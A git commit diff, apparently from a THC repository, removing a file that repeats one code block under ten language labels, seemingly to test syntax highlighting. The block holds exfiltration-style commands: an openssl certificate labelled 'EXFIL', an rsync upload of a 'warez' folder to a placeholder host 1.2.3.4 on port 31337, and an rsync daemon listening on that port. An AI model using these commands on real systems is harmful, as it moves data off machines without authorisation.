This commit is contained in:
SkyperTHC
2023-09-18 12:58:03 +01:00
parent c431a86019
commit d9d30a47c8
-79
View File
@@ -1,79 +0,0 @@
applescript
```applescript
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
elixir
```elixir
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
julia
```julia
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
livescript
```livescript
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
pgsql
```pgsql
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
php
```php
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
powershell
```powershell
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
r
```r
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
ruby
```ruby
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```
sql
```sql
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
```